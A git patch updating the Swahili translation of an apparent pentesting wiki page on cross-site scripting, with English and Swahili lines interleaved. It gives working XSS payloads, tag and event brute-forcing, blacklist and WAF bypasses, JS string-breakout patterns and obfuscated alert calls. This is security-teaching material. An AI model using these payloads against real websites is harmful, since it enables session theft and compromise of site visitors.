From b40a1679e9c7bdcdfbd0be9648db19957748b819 Mon Sep 17 00:00:00 2001 From: Translator Date: Mon, 29 Sep 2025 15:07:50 +0000 Subject: [PATCH] Translated ['src/pentesting-web/xss-cross-site-scripting/wasm-linear-mem --- src/SUMMARY.md | 1 + .../xss-cross-site-scripting/README.md | 418 +++++++++--------- ...sm-linear-memory-template-overwrite-xss.md | 133 ++++++ 3 files changed, 347 insertions(+), 205 deletions(-) create mode 100644 src/pentesting-web/xss-cross-site-scripting/wasm-linear-memory-template-overwrite-xss.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index be4d4275a..4c7d77d24 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -725,6 +725,7 @@ - [SOME - Same Origin Method Execution](pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md) - [Sniff Leak](pentesting-web/xss-cross-site-scripting/sniff-leak.md) - [Steal Info JS](pentesting-web/xss-cross-site-scripting/steal-info-js.md) + - [Wasm Linear Memory Template Overwrite Xss](pentesting-web/xss-cross-site-scripting/wasm-linear-memory-template-overwrite-xss.md) - [XSS in Markdown](pentesting-web/xss-cross-site-scripting/xss-in-markdown.md) - [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md) - [XS-Search/XS-Leaks](pentesting-web/xs-search/README.md) diff --git a/src/pentesting-web/xss-cross-site-scripting/README.md b/src/pentesting-web/xss-cross-site-scripting/README.md index 4c1b74ec0..5683df430 100644 --- a/src/pentesting-web/xss-cross-site-scripting/README.md +++ b/src/pentesting-web/xss-cross-site-scripting/README.md 
@@ -4,81 +4,80 @@ ## Mbinu -1. Angalia kama **thamani yoyote unayodhibiti** (_parameters_, _path_, _headers_?, _cookies_?) ina **inaakisiwa** kwenye HTML au **inatumika** na **JS** code. -2. **Tafuta muktadha** ambapo imeakisiwa/inatumika. -3. Ikiwa **imeakisiwa** +1. Angalia kama **thamani yoyote unayonadhibiti** (_parameters_, _path_, _headers_?, _cookies_?) inarudishwa (**reflected**) katika HTML au **inatumika** na **JS** code. +2. **Tambua muktadha** ambako inarudishwa/inatumiwa. +3. Ikiwa **inarudishwa** 1. Angalia **ni alama gani unaweza kutumia** na kulingana na hilo, andaa payload: 1. Katika **raw HTML**: -1. Je, unaweza kuunda new HTML tags? -2. Je, unaweza kutumia events au attributes zinazounga mkono protocol ya `javascript:`? -3. Je, unaweza bypass kinga? -4. Je, HTML content inaelezwa na engine yoyote ya client side JS (_AngularJS_, _VueJS_, _Mavo_...)? Unaweza kuabusu [**Client Side Template Injection**](../client-side-template-injection-csti.md). -5. Ikiwa huwezi kuunda HTML tags zinazotekeleza JS code, je, unaweza kuabusu [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection/index.html)? +1. Je, unaweza kuunda tags mpya za HTML? +2. Je, unaweza kutumia events au attributes zinazounga mkono `javascript:` protocol? +3. Je, unaweza kuepuka ulinzi? +4. Je, maudhui ya HTML yanatafsiriwa na engine yoyote ya client side JS (_AngularJS_, _VueJS_, _Mavo_...), ambayo unaweza kutumia [**Client Side Template Injection**](../client-side-template-injection-csti.md). +5. Ikiwa huwezi kuunda HTML tags zinazotekeleza code ya JS, je, unaweza kutumia [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection/index.html)? 2. Ndani ya **HTML tag**: -1. Je, unaweza kutoka kwenye attribute na kutoka kwenye tag (basi utakuwa kwenye raw HTML) na kuunda new HTML tag ya kuabusu? -2. Je, unaweza kuunda new events/attributes za kutekeleza JS code? -3. 
Je, attribute ambamo umekwama inaunga mkono utekelezaji wa JS? -4. Je, unaweza bypass kinga? +1. Je, unaweza kutoka katika muktadha wa raw HTML? +2. Je, unaweza kuunda events/attributes mpya za kukimbisha JS code? +3. Je, attribute ambamo umefungwa inaunga mkono utekelezaji wa JS? +4. Je, unaweza kuepuka ulinzi? 3. Ndani ya **JavaScript code**: -1. Je, unaweza kutoka kwenye ``** tags za ukurasa wa HTML, ndani ya faili `.js` au ndani ya attribute inayotumia protocol ya **`javascript:`**: +Katika kesi hii ingizo lako linaonyeshwa kati ya **``** tags za ukurasa wa HTML, ndani ya faili `.js` au ndani ya sifa inayotumia protocol **`javascript:`**: -- Ikiwa kinafunuliwa kati ya **``** tags, hata kama kiingilio chako kiko ndani ya aina yoyote ya quotes, unaweza kujaribu kuchoma `` na kutoroka kutoka katika muktadha huu. Hii inafanya kazi kwa sababu **browser will first parse the HTML tags** na kisha yaliyomo, kwa hiyo haitagundua kuwa tagi yako ya `` iliyochomwa iko ndani ya HTML code. -- Ikiwa kinafunuliwa **ndani ya JS string** na trick ya mwisho haifanyi kazi utahitaji **kuondoka** kwenye string, **kutekeleza** code yako na **kujenga upya** JS code (kama kuna kosa lolote, haitatekelezwa: +- Ikiwa imeonyeshwa kati ya **``** tags, hata kama ingizo lako liko ndani ya aina yoyote ya nukuu, unaweza kujaribu kuingiza `` na kutoroka katika muktadha huu. Hii inafanya kazi kwa sababu **kivinjari kitasoma kwanza lebo za HTML** kisha yaliyomo, kwa hiyo haitagundua kuwa tagi yako ya `` uliyoingiza iko ndani ya msimbo wa HTML. +- Ikiwa imeonyeshwa **ndani ya JS string** na mbinu ya mwisho haitumiki utahitaji **kutoka** kwenye string, **kutekeleza** msimbo wako na **kujenga upya** msimbo wa JS (kama kuna kosa, hautatekelezwa: - `'-alert(1)-'` - `';-alert(1)//` - `\';alert(1)//` -- Ikiwa kinafunuliwa ndani ya template literals unaweza **kuingiza JS expressions** kwa kutumia `${ ... 
}` syntax: `` var greetings = `Hello, ${alert(1)}` `` -- **Unicode encode** inafanya kazi kuandika **valid javascript code**: +- Ikiwa imeonyeshwa ndani ya template literals unaweza **kuingiza expressions za JS** ukitumia syntaxi `${ ... }`: `var greetings = `Hello, ${alert(1)}`` +- **Kutumia encoding ya Unicode** hufanya iwezekane kuandika **valid javascript code**: ```javascript alert(1) alert(1) @@ -86,8 +85,8 @@ alert(1) ``` #### Javascript Hoisting -Javascript Hoisting inaashiria fursa ya **kutangaza functions, variables or classes baada ya kutumika ili uweze kutumia vibaya mazingira ambapo XSS inatumia undeclared variables au functions.**\ -**Angalia ukurasa ufuatao kwa habari zaidi:** +Javascript Hoisting inarejelea fursa ya **kutangaza functions, variables au classes baada ya zimetumika ili uweze kutumia mazingira ambapo XSS inatumia undeclared variables au functions.**\ +**Tazama ukurasa ufuatao kwa maelezo zaidi:** {{#ref}} 
@@ -96,19 +95,19 @@ js-hoisting.md ### Javascript Function -Several web pages have endpoints that **accept as parameter the name of the function to execute**. A common example to see in the wild is something like: `?callback=callbackFunc`. +Kurasa kadhaa za wavuti zina endpoints ambazo **zinakubali kama parameter jina la function la kutekeleza**. Mfano wa kawaida wa kuona ni kitu kama: `?callback=callbackFunc`. -Njia nzuri ya kugundua ikiwa kitu kinachotolewa moja kwa moja na mtumiaji kinajaribu kutekelezwa ni **kubadilisha thamani ya param** (kwa mfano kuwa 'Vulnerable') na kuangalia console kwa makosa kama: +Njia nzuri ya kugundua kama kitu kinachotolewa moja kwa moja na mtumiaji kinajaribu kutekelezwa ni kwa **kubadilisha thamani ya param** (kwa mfano kuwa 'Vulnerable') na kuangalia console kwa makosa kama: ![](<../../images/image (711).png>) -Iwapo ni vulnerable, unaweza kuweza **kuamsha an alert** kwa kutuma thamani: **`?callback=alert(1)`**. Hata hivyo, ni kawaida kuwa endpoints hizi zitakuwa **zikithibitisha maudhui** ili kuruhusu tu letters, numbers, dots na underscores (**`[\w\._]`**). +Ikiwa ni vulnerable, unaweza kuwa na uwezo wa **kusababisha alert** kwa kutuma tu thamani: **`?callback=alert(1)`**. Hata hivyo, mara nyingi endpoint hizi zitakuwa **zikithibitisha yaliyomo** ili kuruhusu tu herufi, nambari, titikio na underscores (**`[\w\._]`**). -Hata hivyo, hata kwa kizuizi hicho bado inawezekana kufanya baadhi ya vitendo. Hii ni kwa sababu unaweza kutumia chars hizo halali ili **kupata access kwa element yoyote katika DOM**: +Hata hivyo, hata kwa kikomo hicho bado inawezekana kufanya baadhi ya vitendo. Hii ni kwa sababu unaweza kutumia chars halali hizo kufikia **element yoyote kwenye DOM**: ![](<../../images/image (747).png>) -Some useful functions for this: +Baadhi ya functions zenye manufaa kwa hili: ``` firstElementChild lastElementChild 
@@ -116,11 +115,11 @@ nextElementSibiling lastElementSibiling parentElement ``` -Unaweza pia kujaribu kusababisha Javascript functions moja kwa moja: `obj.sales.delOrders`. +Unaweza pia kujaribu **kusababisha Javascript functions** moja kwa moja: `obj.sales.delOrders`. -Hata hivyo, kawaida endpoints zinazotekeleza function iliyotajwa ni endpoints zisizo na DOM nyingi za kuvutia, **other pages in the same origin** zitakuwa na **more interesting DOM** za kufanya vitendo zaidi. +Hata hivyo, kawaida endpoints zinazotekeleza function iliyoashiriwa ni endpoints zisizo na DOM yenye mvuto mwingi, **kurasa nyingine katika same origin** zitakuwa na **DOM yenye mvuto zaidi** za kufanya vitendo vingi. -Kwa hivyo, ili **abuse this vulnerability in a different DOM** uhusishaji wa **Same Origin Method Execution (SOME)** ulitengenezwa: +Hivyo, ili **kuutumia udhaifu huu kwenye DOM tofauti** exploit ya **Same Origin Method Execution (SOME)** ilitengenezwa: {{#ref}} @@ -129,8 +128,7 @@ some-same-origin-method-execution.md ### DOM -Kuna **JS code** inayotumia kwa njia **isiyo salama** baadhi ya **data controlled by an attacker** kama `location.href`. Mshambulizi anaweza kutumia hili kutekeleza arbitrary JS code. - +Kuna **JS code** inayotumia kwa njia isiyo salama baadhi ya **data inayodhibitiwa na mshambulizi** kama `location.href`. Mshambulizi anaweza kutumia hili kuendesha arbitrary JS code. {{#ref}} dom-xss.md 
@@ -138,8 +136,8 @@ dom-xss.md ### **Universal XSS** -Aina hizi za XSS zinaweza kupatikana **anywhere**. Hazitegemei tu unyonyaji wa client wa web application bali zinategemea **any** **context**. Aina hizi za **arbitrary JavaScript execution** zinaweza hata kutumiwa kupata **RCE**, kusoma **arbitrary** **files** kwa clients na servers, na mengine mengi.\ -Baadhi ya **examples**: +Aina hizi za XSS zinaweza kupatikana **mahali popote**. Hazitegemei tu udhaifu wa client wa web application bali zinategemea **muktadha** wowote. Aina hizi za **arbitrary JavaScript execution** zinaweza hata kutumiwa kupata **RCE**, **kusoma** **faili zozote** kwenye clients na servers, na mengine mengi.\ +Baadhi ya **mfano**: {{#ref}} 
@@ -155,11 +153,11 @@ server-side-xss-dynamic-pdf.md ![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](<../../images/EauBb2EX0AERaNK (1).jpg>) -## Kuingiza ndani ya raw HTML +## Injecting inside raw HTML -Wakati input yako inarudishwa **inside the HTML page** au unaweza kutoroka na kuingiza HTML code katika muktadha huu, jambo la **kwanza** unalopaswa kufanya ni kuangalia kama unaweza kutumia `<` kuunda tags mpya: Jaribu tu **reflect** hiyo **char** na angalia kama inafanyiwa **HTML encoded** au **deleted** au kama inarudishwa **without changes**. **Ni tu katika kesi ya mwisho utaweza ku-exploit hili**.\ -Kwa kesi hizi pia **kumbuka** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\ -_**Kumbuka: Maoni ya HTML yanaweza kufungwa kwa kutumia\*\***\***\*`-->`\*\***\***\*au \*\***`--!>`\*\***_ +When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\ +For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\ +_**Kumbuka: A HTML comment can be closed using\*\***\***\*`-->`\*\***\***\*or \*\***`--!>`\*\***_ Katika kesi hii na ikiwa hakuna black/whitelisting inatumiwa, unaweza kutumia payloads kama: ```html 
@@ -169,22 +167,22 @@ alert(1) ``` -Lakini, ikiwa tags/attributes black/whitelisting inatumika, utahitaji **brute-force which tags** unaweza kuunda.\ -Mara utakapogundua **which tags are allowed**, utahitaji **brute-force attributes/events** ndani ya tags halali ulizopata ili kuona jinsi unaweza kushambulia muktadha. +Lakini, ikiwa black/whitelisting ya tags/attributes inatumiwa, utahitaji **brute-force which tags** unaweza kuunda.\ +Mara utakapo **gundua ni tags zipi zinazoruhusiwa**, itabidi **brute-force attributes/events** ndani ya tags halali ulizopata ili kuona jinsi unavyoweza kushambulia muktadha. ### Tags/Events brute-force -Nenda kwenye [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) na bonyeza _**Copy tags to clipboard**_. Kisha, tuma zote kwa kutumia Burp intruder na ukague kama kuna tags ambazo WAF haikutambua kama zenye madhara. Mara utakapogundua tags unazoweza kutumia, unaweza **brute force all the events** ukitumia tags halali (kwenye ukurasa uleule bonyeza _**Copy events to clipboard**_ na fuata utaratibu uleule kama awali). +Nenda kwenye [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) na bonyeza _**Copy tags to clipboard**_. Kisha, tuma zote kwa kutumia Burp intruder na angalia kama kuna tag ambayo WAF haikutambua kama hatari. Mara utakapo gundua tags unazoweza kutumia, unaweza **brute force all the events** kwa kutumia tags halali (katika ukurasa huo huo bonyeza _**Copy events to clipboard**_ na fuata taratibu ule ule kama hapo awali). -### Custom tags +### Tags maalum -Ikiwa hukupata tag yoyote halali ya HTML, unaweza kujaribu **kuunda a custom tag** na kutekeleza JS code kwa kutumia attribute ya `onfocus`. 
Katika request ya XSS, unahitaji kumalizia URL na `#` ili kuifanya page **focus on that object** na **execute** the code: +Ikiwa hukupata tag yoyote ya HTML halali, unaweza kujaribu kuunda tag maalum na kutekeleza JS code kwa kutumia attribute `onfocus`. Katika ombi la XSS, unahitaji kumalizia URL kwa `#` ili kufanya ukurasa **ielekeze kwenye kitu hicho** na **kutekeleza** msimbo: ``` /?search=#x ``` ### Blacklist Bypasses -Ikiwa aina fulani ya blacklist inatumiwa, unaweza kujaribu ku-bypass kwa mbinu za kuchekesha: +Ikiwa aina fulani ya blacklist inatumiwa unaweza kujaribu ku-bypass kwa mbinu za kuchekesha: ```javascript //Random capitalization ``` -### Itifaki Maalum ndani ya sifa +### Itifaki Maalum ndani ya attribute -Huko unaweza kutumia itifaki **`javascript:`** au **`data:`** katika maeneo fulani ili **kuendesha msimbo wowote wa JS**. Baadhi zitahitaji mwingiliano wa mtumiaji; nyingine hazitahitaji. +Huko unaweza kutumia itifaki **`javascript:`** au **`data:`** katika maeneo fulani ili **kutekeleza msimbo wa JS wa hiari**. Baadhi zitahitaji mwingiliano wa mtumiaji; zingine hazitahitaji. ```javascript javascript:alert(1) JavaSCript:alert(1) 
@@ -331,9 +329,9 @@ data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4= data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg== ``` -**Maeneo ambapo unaweza kuingiza protokoli hizi** +**Maeneo unayoweza kuingiza protokoli hizi** -**Kwa ujumla** protokoli ya `javascript:` inaweza **kutumika katika tag yoyote inayokubali attribute `href`** na katika **tag nyingi** zinazokubali attribute ya **`src`** (lakini sio ``) +**Kwa ujumla** protokoli ya `javascript:` inaweza **kutumika katika tag yoyote inayokubali sifa `href`** na katika **sehemu nyingi** za tag zinazokubali sifa ya **`src`** (lakini si ` 
@@ -355,21 +353,21 @@ data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc ``` **Mbinu nyingine za obfuscation** -_**Katika kesi hii HTML encoding na Unicode encoding trick kutoka sehemu ya awali pia ni halali kwa sababu uko ndani ya attribute.**_ +_**Katika kesi hii HTML encoding na Unicode encoding trick kutoka sehemu iliyopita pia ni halali kwani uko ndani ya attribute.**_ ```javascript ``` -Zaidi ya hayo, kuna **njia nyingine nzuri** kwa kesi hizi: **Hata kama input yako ndani ya `javascript:...` inakuwa URL encoded, itakuwa URL decoded kabla haijaendeshwa.** Kwa hivyo, ikiwa unahitaji **escape** kutoka kwa **string** ukitumia **single quote** na ukaona kwamba **inakuwa URL encoded**, kumbuka kwamba **haina umuhimu,** itatafsiriwa kama **single quote** wakati wa **execution**. +Zaidi ya hayo, kuna **njia nzuri** nyingine kwa kesi hizi: **Hata kama input yako ndani ya `javascript:...` inakuwa URL encoded, ita URL decoded kabla ya kutekelezwa.** Kwa hivyo, ikiwa unahitaji **escape** kutoka kwenye **string** ukitumia **single quote** na unaona kwamba **inakuwa URL encoded**, kumbuka kwamba **haina maana,** itaitafsiriwa kama **single quote** wakati wa **execution**. ```javascript '-alert(1)-' %27-alert(1)-%27 ``` -Kumbuka kwamba ikiwa utajaribu **kutumia zote mbili** `URLencode + HTMLencode` kwa utaratibu wowote ili ku-encode **payload** it **haita** **fanya kazi**, lakini unaweza **kuwachanganya ndani ya payload**. +Kumbuka kwamba ukijaribu **tumia zote mbili** `URLencode + HTMLencode` kwa mpangilio wowote ku-encode **payload** **haita** **fanya kazi**, lakini unaweza **changanya ndani ya payload**. 
-**Kutumia Hex na Octal encode na `javascript:`** +**Kutumia Hex and Octal encode with `javascript:`** -Unaweza kutumia **Hex** na **Octal encode** ndani ya sifa ya `src` ya `iframe` (angalau) kutangaza **HTML tags to execute JS**: +Unaweza kutumia **Hex** na **Octal encode** ndani ya sifa ya `src` ya `iframe` (angalau) ili kutaja **HTML tags to execute JS**: ```javascript //Encoded: // This WORKS @@ -385,17 +383,16 @@ Unaweza kutumia **Hex** na **Octal encode** ndani ya sifa ya `src` ya `iframe` ( ```javascript //No safari @@ -431,37 +428,37 @@ onbeforetoggle="alert(2)" />
Newsletter popup
``` -Kutoka [**hapa**](https://portswigger.net/research/xss-in-hidden-input-fields): Unaweza kutekeleza **XSS payload ndani ya attribute iliyofichwa**, mradi unaweza **kumshawishi** **mtu aliyeathirika** kubonyeza **mchanganyiko wa funguo**. Kwenye Firefox kwenye Windows/Linux mchanganyiko wa funguo ni **ALT+SHIFT+X** na kwenye OS X ni **CTRL+ALT+X**. Unaweza kubainisha mchanganyiko tofauti wa funguo kwa kutumia funguo tofauti katika access key attribute. Hapa kuna vektori: +Kutoka [**here**](https://portswigger.net/research/xss-in-hidden-input-fields): Unaweza kutekeleza **XSS payload inside a hidden attribute**, mradi ukaweza **kumshawishi** **mwanaathiriwa** kubonyeza **mchanganyiko wa vitufe**. Kwenye Firefox kwenye Windows/Linux mchanganyiko wa vitufe ni **ALT+SHIFT+X** na kwenye OS X ni **CTRL+ALT+X**. Unaweza kubainisha mchanganyiko tofauti wa vitufe kwa kutumia kitufe tofauti katika access key attribute. Hapa ni vector: ```html ``` -**XSS payload itakuwa kitu kama hiki: `" accesskey="x" onclick="alert(1)" x="`** +**Payload ya XSS itakuwa kama hii: `" accesskey="x" onclick="alert(1)" x="`** ### Blacklist Bypasses -Mbinu kadhaa za kutumia encoding tofauti tayari zilielezwa ndani ya sehemu hii. Rudi **kujifunza wapi unaweza kutumia:** +Mbinu kadhaa za kutumia encoding tofauti zimetajwa tayari ndani ya sehemu hii. Rudi ili kujifunza wapi unaweza kutumia: - **HTML encoding (HTML tags)** -- **Unicode encoding (can be valid JS code):** `\u0061lert(1)` +- **Unicode encoding (inaweza kuwa valid JS code):** `\u0061lert(1)` - **URL encoding** - **Hex and Octal encoding** - **data encoding** **Bypasses for HTML tags and attributes** -Soma the[ Blacklist Bypasses of the previous section](#blacklist-bypasses). +Soma [ Blacklist Bypasses of the previous section](#blacklist-bypasses). **Bypasses for JavaScript code** -Soma J[avaScript bypass blacklist of the following section](#javascript-bypass-blacklists-techniques). 
+Soma the [JavaScript bypass blacklist of the following section](#javascript-bypass-blacklists-techniques). ### CSS-Gadgets -Ikiwa umegundua **XSS katika sehemu ndogo sana** ya tovuti ambayo inahitaji aina fulani ya mwingiliano (labda link ndogo kwenye footer yenye onmouseover element), unaweza kujaribu **kubadilisha nafasi ambayo kipengele hicho kinachukua** ili kuongeza uwezekano wa link itakapoendeshwa. +Ikiwa umepata **XSS katika sehemu ndogo sana** ya tovuti inayohitaji aina fulani ya mwingiliano (labda link ndogo kwenye footer yenye onmouseover element), unaweza kujaribu **kubadilisha nafasi ambayo kipengele hicho kinachukua** ili kuongeza uwezekano wa link kutekelezwa. -Kwa mfano, unaweza kuongeza styling katika element kama: `position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5` +Kwa mfano, unaweza kuongeza styling katika kipengele kama: `position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5` -Lakini, ikiwa WAF inachuja style attribute, unaweza kutumia CSS Styling Gadgets, kwa hivyo ikiwa upata, kwa mfano +Lakini, ikiwa WAF inachuja style attribute, unaweza kutumia CSS Styling Gadgets, kwa hivyo ikiwa unapopata, kwa mfano > .test {display:block; color: blue; width: 100%\} @@ -469,27 +466,27 @@ na > \#someid {top: 0; font-family: Tahoma;} -Sasa unaweza kubadilisha link yetu na kuileta kwa umbo +Sasa unaweza kubadilisha link yetu na kuibadilisha kuwa fomu > \
-Njia hii ilichukuliwa kutoka [https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703](https://medium.com/@skavans_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703) +Njia hii ilichukuliwa kutoka kwa [https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703](https://medium.com/@skavans_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703) ## Injecting inside JavaScript code -Katika kesi hizi, **input** yako itarejea ndani ya JS code ya `.js` file au kati ya `` tags au kati ya HTML events ambazo zinaweza kutekeleza JS code au kati ya attributes zinazokubali `javascript:` protocol. +Katika kesi hizi **input** yako itaonyeshwa ndani ya JS code ya faili `.js` au kati ya `` tags au kati ya HTML events zinazoweza kutekeleza JS code au kati ya attributes zinazokubali protocol ya `javascript:`. -### Escaping \` unaweza kwa urahisi **kuepuka kufunga tag ya ` ``` -Kumbuka kwamba katika mfano huu **hatujafunga hata alama ya nukuu moja**. Hii ni kwa sababu **HTML parsing is performed first by the browser**, ambayo inahusisha kutambua vipengele vya ukurasa, ikiwemo blocks za script. Uchambuzi wa JavaScript ili kuelewa na kutekeleza scripts zilizoungwa ndani unafanywa tu baadaye. +Kumbuka kwamba katika mfano huu **hatujafunga hata nukuu moja**. Hii ni kwa sababu **HTML parsing is performed first by the browser**, ambayo inahusisha kutambua vipengele vya ukurasa, ikiwa ni pamoja na blocks za script. Uchambuzi wa JavaScript ili kuelewa na kutekeleza scripts zilizopachikwa hufanywa tu baadaye. -### Ndani ya JS code +### Ndani ya msimbo wa JS -If `<>` are being sanitised you can still **escape the string** where your input is being **located** and **execute arbitrary JS**. 
Ni muhimu **fix JS syntax**, kwa sababu ikiwa kuna makosa, JS code haitatekelezwa: +Ikiwa `<>` zinasafishwa bado unaweza **escape the string** mahali ambapo ingizo lako limewekwa (**located**) na **execute arbitrary JS**. Ni muhimu **fix JS syntax**, kwa sababu ikiwa kuna makosa, msimbo wa JS hautatekelezwa: ``` '-alert(document.domain)-' ';alert(document.domain)// 
@@ -497,23 +494,23 @@ If `<>` are being sanitised you can still **escape the string** where your input ``` #### JS-in-JS string break → inject → repair pattern -Wakati user input inapoweka ndani ya quoted JavaScript string (kwa mfano, server-side echo into an inline script), unaweza terminate the string, inject code, na repair the syntax ili parsing iendelee kuwa valid. Generic skeleton: +Wakati ingizo la mtumiaji linapoingia ndani ya quoted JavaScript string (kwa mfano, server-side echo katika inline script), unaweza kumaliza string, inject code, na kurekebisha syntax ili parsing ibaki halali. Generic skeleton: ``` " // end original string ; // safely terminate the statement // attacker-controlled JS ; a = " // repair and resume expected string/statement ``` -Mfano wa muundo wa URL wakati parameter hatarishi unarejeshwa ndani ya JS string: +Mfano wa muundo wa URL wakati parameter dhaifu imerejeshwa ndani ya JS string: ``` ?param=test";;a=" ``` -Hii inatekeleza attacker JS bila ya kuhitaji kugusa muktadha wa HTML (pure JS-in-JS). Changanya na blacklist bypasses hapa chini wakati filters zinapozuia maneno muhimu. +Hii inatekeleza attacker JS bila kuhitaji kugusa HTML context (pure JS-in-JS). Changanya na blacklist bypasses hapa chini wakati filters zinapozuia maneno muhimu. -### Template literals `` +### Template literals \`\` -Ili kujenga **strings** mbali na single na double quotes, JS pia inakubali **backticks** **` `` `**. Hii inajulikana kama template literals kwani zinaruhusu **embedded JS expressions** kwa kutumia sintaksia `${ ... }`.\ -Kwa hivyo, ikiwa ugundua kwamba input yako inarudishwa ndani ya JS string inayotumia backticks, unaweza kuiba sintaksia `${ ... }` kutekeleza **arbitrary JS code**: +Ili kuunda **strings**, mbali na single na double quotes, JS pia inakubali **backticks** **` `` `** . Hii inajulikana kama template literals kwani zinaruhusu **embedded JS expressions** kwa kutumia sintaksia `${ ... 
}`.\ +Kwa hivyo, ukigundua kuwa input yako ina **reflected** ndani ya JS string inayotumia backticks, unaweza kutumia sintaksia `${ ... }` kutekeleza **arbitrary JS code**: Hii inaweza **kutumiwa vibaya** kwa kutumia: ```javascript @@ -527,35 +524,35 @@ return loop } loop`` ``` -### Utekelezaji wa msimbo uliokodishwa +### Utekelezaji wa code uliosimbwa ```html ``` -**Javascript ndani ya maoni** +**Javascript ndani ya comment** ```javascript //If you can only inject inside a JS comment, you can still leak something //If the user opens DevTools request to the indicated sourceMappingURL will be send @@ -716,7 +713,7 @@ try{throw onerror=alert}catch{throw 1} - [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md) - [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix) -**Mwito wa kazi yoyote (alert)** +**Kuita function yoyote (alert)** ```javascript //Eval like functions eval('ale'+'rt(1)') 
@@ -776,47 +773,58 @@ top['al\x65rt'](1) top[8680439..toString(30)](1) ``` -## **DOM vulnerabilities** +## **Udhaifu za DOM** -Kuna **JS code** inayotumia **data isiyokuwa salama inayoendeshwa na mshambuliaji** kama `location.href`. Mshambuliaji anaweza kutumia hili kutekeleza msimbo wowote wa JS.\ -**Kwa sababu ya urefu wa maelezo ya** [**DOM vulnerabilities ilihamishiwa kwenye ukurasa huu**](dom-xss.md)**:** +Kuna **JS code** inayotumia **data isiyo salama inayodhibitiwa na mhamasishaji** kama `location.href`. Mhamasishaji anaweza kutumia hili kutekeleza JS arbitrary.\ +**Kutokana na upanuzi wa maelezo ya** [**Udhaifu za DOM - imehamishwa kwenye ukurasa huu**](dom-xss.md)**:** {{#ref}} dom-xss.md {{#endref}} -Utanakutana huko na **maelezo ya kina kuhusu DOM vulnerabilities, jinsi zinavyosababishwa, na jinsi za kuzitumia**.\ -Pia, usisahau kwamba **mwishoni mwa chapisho kilicho takiwa** unaweza kupata maelezo kuhusu [**DOM Clobbering attacks**](dom-xss.md#dom-clobbering). +Hapo utapata **maelezo ya kina kuhusu ni udhaifu gani za DOM, zinawezaje kusababishwa, na jinsi ya kuzitumia**.\ +Pia, usisahau kwamba **mwishoni mwa chapisho kilichotajwa** utaona maelezo kuhusu [**DOM Clobbering attacks**](dom-xss.md#dom-clobbering). -### Upgrading Self-XSS +### Kuimarisha Self-XSS ### Cookie XSS -Ikiwa unaweza kuchochea XSS kwa kutuma payload ndani ya cookie, kawaida hii ni self-XSS. Hata hivyo, ukipata **vulnerable subdomain to XSS**, unaweza kutumia XSS hii kuingiza cookie kwa kikoa chote na hivyo kuchochea cookie XSS kwenye kikoa kikuu au subdomains nyingine (mmoja walio vulnerable kwa cookie XSS). Kwa hili unaweza kutumia cookie tossing attack: +Ikiwa unaweza kusababisha XSS kwa kutuma payload ndani ya cookie, kawaida hii ni self-XSS. Hata hivyo, ukigundua **subdomain iliyo dhaifu kwa XSS**, unaweza kutumia XSS hiyo kuingiza cookie katika domain nzima na kusababisha cookie XSS kwenye domain kuu au subdomain nyingine (zile zilizo dhaifu kwa cookie XSS). 
